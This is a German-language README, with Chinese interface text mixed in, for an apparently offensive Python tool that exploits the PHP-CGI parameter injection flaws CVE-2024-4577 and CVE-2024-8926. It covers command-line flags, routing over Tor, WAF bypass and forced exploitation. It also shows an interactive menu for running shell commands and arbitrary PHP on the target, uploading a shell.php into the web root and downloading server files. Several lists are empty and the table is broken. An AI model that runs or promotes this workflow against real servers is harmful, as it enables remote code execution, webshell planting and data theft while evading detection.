
Ein Sicherheits-Penetrationstool zum Testen von CVE-2024-4577 und CVE-2024-8926.
🚀 CVE-2024-4577 & CVE-2024-8926 Exploit Tool
Ein automatisiertes Testwerkzeug für die PHP-CGI-Parameterinjektions-Schwachstelle, das CVE-2024-4577 und CVE-2024-8926 unterstützt und Aktionen wie Befehlsausführung, Datei-Upload und -Download ermöglicht.
Dieses Tool dient zum Testen von Parameterinjektions-Schwachstellen in PHP-CGI-Umgebungen und bietet:
Dieses Tool ist ausschließlich für legale Tests und akademische Zwecke bestimmt. Bitte nicht auf nicht autorisierten Systemen verwenden!
⚠️ Bei illegaler Nutzung drohen rechtliche Konsequenzen!
Dieses Tool ist nur vorgesehen für:
Dieses Tool benötigt die folgenden Python-Pakete. Bitte zuerst installieren:
pip install -r requirements.txt
Oder manuell installieren:
pip install requests requests-tor chardet urllib3 rich
python exploit.py -u URL [--timeout sec] [--delay sec] [--log] [--verbose] [--payload PAYLOAD] [--bypass] [--tor] [--no-effects] [--force] [--cgipoint PATHS...]
Beispiele:
python exploit.py -u http://example.com --timeout 30 --payload 2 --log --tor --verbose
python exploit.py -u http://example.com --bypass --force
python exploit.py -u http://example.com --cgipoint /php-cgi/php-cgi.exe /cgi-bin/php
Wenn das Skript eine Schwachstelle findet, wird das folgende Menü angezeigt:
╭──────────── Exploit 模式選單 ────────────╮
│ 當前目標:http://example.com/ │
│ 當前注入點:/php-cgi/php-cgi.exe │
│ 漏洞編號:CVE-2024-4577 │
╰────────────────────────────────────────────╯
1) 🧪 Shell模式
2) 🛠️ PHP自訂端模式
3) 📤 上傳檔案
4) 📥 下載檔案
5) 🎯 切換攻擊目標
6) ⚙️ 設定參數
7) ❌ 離開程式
>>
Systembefehle ausführen:
shell> whoami
📂 Ausgabe speichern
shell> whoami --save
shell> whoami --save C:\output\whoami.txt
Benutzerdefinierten PHP-Code ausführen:
phpinfo();
EOF
📂 Ausgabe speichern
phpinfo();
EOF --save
phpinfo();
EOF --save C:\output\info.html
本地檔案路徑:C:\test\shell.php
目標完整路徑:
[*] 已自動設定上傳路徑為: C:/xampp/htdocs/shell.php
📂 Pfad manuell angeben
目標完整路徑:C:\xampp\php\shell.php
遠端檔案路徑:C:\xampp\htdocs\index.php
📂 Heruntergeladene Dateien werden in download/ gespeichert. Bei Namenskonflikten wird automatisch eine Nummer hinzugefügt.
[*] 檔案下載完成,儲存在 download/index.php
輸入新目標URL: http://newtarget.com
🔹 Die Schwachstelle wird anschließend erneut getestet.
[⚙️ 利用階段參數設定選單]
1) 切換荷載 Payload 1
2) 繞過模組 Bypass 未選擇
3) 等待時間 Timeout 10 秒
4) 請求延遲 Delay 0 秒
5) 自動紀錄 Log 關閉
6) 詳細模式 Verbose 關閉
7) 動畫效果 Effects 開啟
8) 強制利用 Force 關閉
9) 儲存並返回 Exploit 選單
Die folgenden Umgehungsstrategien werden bereitgestellt:
php://input durch andere Schreibweisen ersetzen| Parameter | Beschreibung | Beispiel |
|---|
-u , --url | Ziel-URL angeben | -u http://example.com |
--timeout sec | Anforderungs-Timeout festlegen (0 = unbegrenzt) | --timeout 30 |
--log | Shell-Befehle automatisch protokollieren | --log |
--payload | Payload-Kombination auswählen oder anpassen | --payload 2 |
--tor | Anfragen über Tor senden | --tor |
--verbose | Detaillierte Ausgaben anzeigen | --verbose |
--bypass | WAF-Bypass-Modus aktivieren | --bypass |
--force | Exploit-Modus erzwingen | --force |
--cgipoint PATHS | Bestimmte CGI-Pfade zum Testen angeben | --cgipoint /path |
--delay sec | Verzögerung in Sekunden zwischen den Anfragen | --delay 1.5 |
--no-effects | Alle Animationen und Verzögerungseffekte deaktivieren | --no-effects |